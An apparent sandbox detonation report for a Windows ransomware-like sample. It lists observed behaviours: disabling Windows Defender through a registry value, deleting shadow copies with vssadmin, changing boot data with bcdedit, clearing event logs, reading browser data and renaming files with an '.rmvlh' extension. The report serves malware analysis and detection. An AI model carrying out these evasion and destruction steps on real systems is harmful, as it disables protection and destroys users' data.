Analysis Overview
SHA256
edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050
Threat Level: Known bad
The file edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050 was found to be: Known bad.
Malicious Activity Summary
Modifies security service
Deletes Windows Defender Definitions
Modifies Windows Defender Real-time Protection settings
Modifies boot configuration data using bcdedit
Clears Windows event logs
Deletes shadow copies
Reads user/profile data of web browsers
Drops file in Program Files directory
Launches sc.exe
Suspicious use of AdjustPrivilegeToken
Suspicious behavior: EnumeratesProcesses
Suspicious use of WriteProcessMemory
Runs net.exe
Interacts with shadow copies
Modifies registry class
MITRE ATT&CK
Enterprise Matrix V6
Analysis: static1
Detonation Overview
Reported
2022-01-13 13:29
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2022-01-13 13:29
Reported
2022-01-13 13:34
Platform
win7-en-20211208
Max time kernel
121s
Max time network
121s
Command Line
Signatures
Deletes Windows Defender Definitions
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Windows Defender\MpCmdRun.exe | N/A |
Modifies Windows Defender Real-time Protection settings
Modifies security service
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WinDefend\Start = "4" | C:\Windows\system32\reg.exe | N/A |
Clears Windows event logs
Deletes shadow copies
Modifies boot configuration data using bcdedit
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
Reads user/profile data of web browsers
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD14830_.GIF.h_0kEoGmKybSnh38Sj_Tti--VX1eIKystzt8Bx8AXyH_q8naHqLas7k0.rmvlh | C:\Users\Admin\AppData\Local\Temp\edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Athens.h_0kEoGmKybSnh38Sj_Tti--VX1eIKystzt8Bx8AXyH_fBAKzovnsMc0.rmvlh | C:\Users\Admin\AppData\Local\Temp\edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Common Files\System\Ole DB\de-DE\oledb32r.dll.mui | C:\Users\Admin\AppData\Local\Temp\edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SO01954_.WMF.h_0kEoGmKybSnh38Sj_Tti--VX1eIKystzt8Bx8AXyH_tBgdxKYvZEs0.rmvlh | C:\Users\Admin\AppData\Local\Temp\edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\Bibliography\Style\GostName.XSL.h_0kEoGmKybSnh38Sj_Tti--VX1eIKystzt8Bx8AXyH_O3Zq2CDkm-M0.rmvlh | C:\Users\Admin\AppData\Local\Temp\edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\BOATINST.WMF.h_0kEoGmKybSnh38Sj_Tti--VX1eIKystzt8Bx8AXyH_32nebOUrjb40.rmvlh | C:\Users\Admin\AppData\Local\Temp\edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\DGWEBPQT.DPV.h_0kEoGmKybSnh38Sj_Tti--VX1eIKystzt8Bx8AXyH_Dmy7tNSWpx00.rmvlh | C:\Users\Admin\AppData\Local\Temp\edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Sidebar\Gadgets\Currency.Gadget\es-ES\js\library.js | C:\Users\Admin\AppData\Local\Temp\edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.help_2.0.102.v20141007-2301\META-INF\MANIFEST.MF.h_0kEoGmKybSnh38Sj_Tti--VX1eIKystzt8Bx8AXyH_NMsrl_Powi00.rmvlh | C:\Users\Admin\AppData\Local\Temp\edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Legal\ENU\license.html | C:\Users\Admin\AppData\Local\Temp\edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\MEDIA\PUSH.WAV.h_0kEoGmKybSnh38Sj_Tti--VX1eIKystzt8Bx8AXyH_gntmRNGXg-E0.rmvlh | C:\Users\Admin\AppData\Local\Temp\edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Sidebar\Gadgets\Currency.Gadget\images\triangle.png | C:\Users\Admin\AppData\Local\Temp\edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\System\Ole DB\de-DE\msdasqlr.dll.mui | C:\Users\Admin\AppData\Local\Temp\edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0215070.WMF.h_0kEoGmKybSnh38Sj_Tti--VX1eIKystzt8Bx8AXyH_g7jrEEhBoTY0.rmvlh | C:\Users\Admin\AppData\Local\Temp\edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0107452.WMF.h_0kEoGmKybSnh38Sj_Tti--VX1eIKystzt8Bx8AXyH_XNQIUHn9Q8w0.rmvlh | C:\Users\Admin\AppData\Local\Temp\edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\SlateBlue.css.h_0kEoGmKybSnh38Sj_Tti--VX1eIKystzt8Bx8AXyH_hUqN8yxxYhI0.rmvlh | C:\Users\Admin\AppData\Local\Temp\edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe | N/A |
| File opened for modification | C:\Program Files\DVD Maker\Shared\DvdStyles\Pets\Pets_image-frame-backglow.png | C:\Users\Admin\AppData\Local\Temp\edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Common Files\microsoft shared\TRANSLAT\ARFR\MSB1ARFR.ITS.h_0kEoGmKybSnh38Sj_Tti--VX1eIKystzt8Bx8AXyH_lXVbhvT6vSo0.rmvlh | C:\Users\Admin\AppData\Local\Temp\edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\BrightYellow\TAB_OFF.GIF.h_0kEoGmKybSnh38Sj_Tti--VX1eIKystzt8Bx8AXyH_6WiCfMVwoL80.rmvlh | C:\Users\Admin\AppData\Local\Temp\edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_black_moon-new.png | C:\Users\Admin\AppData\Local\Temp\edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD10299_.GIF.h_0kEoGmKybSnh38Sj_Tti--VX1eIKystzt8Bx8AXyH_E-uhKTAXjBc0.rmvlh | C:\Users\Admin\AppData\Local\Temp\edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\SMIMEE.CFG.h_0kEoGmKybSnh38Sj_Tti--VX1eIKystzt8Bx8AXyH_ZtfLuxpM_XE0.rmvlh | C:\Users\Admin\AppData\Local\Temp\edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe | N/A |
| File opened for modification | C:\Program Files\VideoLAN\VLC\locale\oc\LC_MESSAGES\vlc.mo.h_0kEoGmKybSnh38Sj_Tti--VX1eIKystzt8Bx8AXyH_GG3mSPak3s80.rmvlh | C:\Users\Admin\AppData\Local\Temp\edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0182689.JPG.h_0kEoGmKybSnh38Sj_Tti--VX1eIKystzt8Bx8AXyH_Qzx-fxquskA0.rmvlh | C:\Users\Admin\AppData\Local\Temp\edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.simpleconfigurator.manipulator.nl_ja_4.4.0.v20140623020002.jar.h_0kEoGmKybSnh38Sj_Tti--VX1eIKystzt8Bx8AXyH_eX_uxGJFv140.rmvlh | C:\Users\Admin\AppData\Local\Temp\edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-openide-util-lookup.xml.h_0kEoGmKybSnh38Sj_Tti--VX1eIKystzt8Bx8AXyH_XMiiT1NLyTU0.rmvlh | C:\Users\Admin\AppData\Local\Temp\edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Grayscale.xml.h_0kEoGmKybSnh38Sj_Tti--VX1eIKystzt8Bx8AXyH_MyeNg9QChRg0.rmvlh | C:\Users\Admin\AppData\Local\Temp\edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD15171_.GIF.h_0kEoGmKybSnh38Sj_Tti--VX1eIKystzt8Bx8AXyH_LhnPkkALBf80.rmvlh | C:\Users\Admin\AppData\Local\Temp\edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\Groove\Sounds\Things\SHOT.WAV.h_0kEoGmKybSnh38Sj_Tti--VX1eIKystzt8Bx8AXyH_5PVqa109Xp00.rmvlh | C:\Users\Admin\AppData\Local\Temp\edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\PAGESIZE\PGLBL111.XML.h_0kEoGmKybSnh38Sj_Tti--VX1eIKystzt8Bx8AXyH_na7NyQQ5jdc0.rmvlh | C:\Users\Admin\AppData\Local\Temp\edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe | N/A |
| File opened for modification | C:\Program Files\Windows Journal\es-ES\jnwmon.dll.mui | C:\Users\Admin\AppData\Local\Temp\edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_black_rainy.png | C:\Users\Admin\AppData\Local\Temp\edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Games\Multiplayer\Backgammon\en-US\bckgzm.exe.mui.h_0kEoGmKybSnh38Sj_Tti--VX1eIKystzt8Bx8AXyH_2HXho5P3Gl80.rmvlh | C:\Users\Admin\AppData\Local\Temp\edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe | N/A |
| File opened for modification | C:\Program Files\Mozilla Firefox\defaults\pref\channel-prefs.js.h_0kEoGmKybSnh38Sj_Tti--VX1eIKystzt8Bx8AXyH_MVcAMbeE5DQ0.rmvlh | C:\Users\Admin\AppData\Local\Temp\edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe | N/A |
| File opened for modification | C:\Program Files\VideoLAN\VLC\locale\pa\LC_MESSAGES\vlc.mo.h_0kEoGmKybSnh38Sj_Tti--VX1eIKystzt8Bx8AXyH_a6fwT4Kt7IM0.rmvlh | C:\Users\Admin\AppData\Local\Temp\edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0107488.WMF.h_0kEoGmKybSnh38Sj_Tti--VX1eIKystzt8Bx8AXyH_acye6FqJznI0.rmvlh | C:\Users\Admin\AppData\Local\Temp\edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME02.CSS.h_0kEoGmKybSnh38Sj_Tti--VX1eIKystzt8Bx8AXyH_YN-fGXEFsWQ0.rmvlh | C:\Users\Admin\AppData\Local\Temp\edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe | N/A |
| File opened for modification | C:\Program Files\DVD Maker\Shared\DvdStyles\BabyGirl\chapters-static.png | C:\Users\Admin\AppData\Local\Temp\edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ecf.identity_3.4.0.v20140827-1444.jar.h_0kEoGmKybSnh38Sj_Tti--VX1eIKystzt8Bx8AXyH_ocQJUK7c0n40.rmvlh | C:\Users\Admin\AppData\Local\Temp\edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\Solutions\Generic.gif.h_0kEoGmKybSnh38Sj_Tti--VX1eIKystzt8Bx8AXyH_bhBwqbaa8bc0.rmvlh | C:\Users\Admin\AppData\Local\Temp\edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PE00693_.WMF.h_0kEoGmKybSnh38Sj_Tti--VX1eIKystzt8Bx8AXyH_vXB9HTNA8m40.rmvlh | C:\Users\Admin\AppData\Local\Temp\edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Slipstream.xml.h_0kEoGmKybSnh38Sj_Tti--VX1eIKystzt8Bx8AXyH_0c3y7VMLSkU0.rmvlh | C:\Users\Admin\AppData\Local\Temp\edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre7\lib\zi\Asia\Krasnoyarsk.h_0kEoGmKybSnh38Sj_Tti--VX1eIKystzt8Bx8AXyH_bkVO1BQVLrQ0.rmvlh | C:\Users\Admin\AppData\Local\Temp\edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD15134_.GIF.h_0kEoGmKybSnh38Sj_Tti--VX1eIKystzt8Bx8AXyH_pUrJmlMFCN40.rmvlh | C:\Users\Admin\AppData\Local\Temp\edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\Microsoft Shared\Stationery\Bears.htm | C:\Users\Admin\AppData\Local\Temp\edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.text.nl_zh_4.4.0.v20140623020002.jar.h_0kEoGmKybSnh38Sj_Tti--VX1eIKystzt8Bx8AXyH_gmV0juBTptc0.rmvlh | C:\Users\Admin\AppData\Local\Temp\edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-core-io-ui_zh_CN.jar.h_0kEoGmKybSnh38Sj_Tti--VX1eIKystzt8Bx8AXyH_eMQb2y2Hopo0.rmvlh | C:\Users\Admin\AppData\Local\Temp\edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\ja-JP\settings.html | C:\Users\Admin\AppData\Local\Temp\edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH01332U.BMP.h_0kEoGmKybSnh38Sj_Tti--VX1eIKystzt8Bx8AXyH_2Rw-2MPJofs0.rmvlh | C:\Users\Admin\AppData\Local\Temp\edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\AUTOSHAP\BD18206_.WMF.h_0kEoGmKybSnh38Sj_Tti--VX1eIKystzt8Bx8AXyH_stjNgnZoEX00.rmvlh | C:\Users\Admin\AppData\Local\Temp\edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Africa\Monrovia.h_0kEoGmKybSnh38Sj_Tti--VX1eIKystzt8Bx8AXyH_f5OvBs_qv3M0.rmvlh | C:\Users\Admin\AppData\Local\Temp\edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\rarrow.gif.h_0kEoGmKybSnh38Sj_Tti--VX1eIKystzt8Bx8AXyH_jKmBN4eI06M0.rmvlh | C:\Users\Admin\AppData\Local\Temp\edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\engphon.env.h_0kEoGmKybSnh38Sj_Tti--VX1eIKystzt8Bx8AXyH_l79V25HqI8Y0.rmvlh | C:\Users\Admin\AppData\Local\Temp\edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\TURKISH.TXT | C:\Users\Admin\AppData\Local\Temp\edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Common Files\microsoft shared\ink\fr-FR\rtscom.dll.mui | C:\Users\Admin\AppData\Local\Temp\edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0148309.JPG.h_0kEoGmKybSnh38Sj_Tti--VX1eIKystzt8Bx8AXyH_C-ixsYGeRAo0.rmvlh | C:\Users\Admin\AppData\Local\Temp\edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\Oasis\TAB_ON.GIF.h_0kEoGmKybSnh38Sj_Tti--VX1eIKystzt8Bx8AXyH__lgWEmOmrNs0.rmvlh | C:\Users\Admin\AppData\Local\Temp\edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Sidebar\Gadgets\SlideShow.Gadget\en-US\settings.html | C:\Users\Admin\AppData\Local\Temp\edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre7\lib\deploy\messages_fr.properties.h_0kEoGmKybSnh38Sj_Tti--VX1eIKystzt8Bx8AXyH_23BAO480mQA0.rmvlh | C:\Users\Admin\AppData\Local\Temp\edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_shared.gif | C:\Users\Admin\AppData\Local\Temp\edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\de-DE\gadget.xml | C:\Users\Admin\AppData\Local\Temp\edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0239191.WMF.h_0kEoGmKybSnh38Sj_Tti--VX1eIKystzt8Bx8AXyH_-V3hhvSTVu80.rmvlh | C:\Users\Admin\AppData\Local\Temp\edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\Adobe.css.h_0kEoGmKybSnh38Sj_Tti--VX1eIKystzt8Bx8AXyH_IOwcWBH1I_c0.rmvlh | C:\Users\Admin\AppData\Local\Temp\edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-swing-tabcontrol.jar.h_0kEoGmKybSnh38Sj_Tti--VX1eIKystzt8Bx8AXyH_5HG9nCJhnpo0.rmvlh | C:\Users\Admin\AppData\Local\Temp\edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe | N/A |
Launches sc.exe
Interacts with shadow copies
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\vssadmin.exe | N/A |
Runs net.exe
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\edf2a5884966065ed47411a82df4c2b41bbbd217ea568be99ab72f6c10f4c050.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\wevtutil.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\wevtutil.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\wevtutil.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\wevtutil.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\wevtutil.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\wevtutil.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
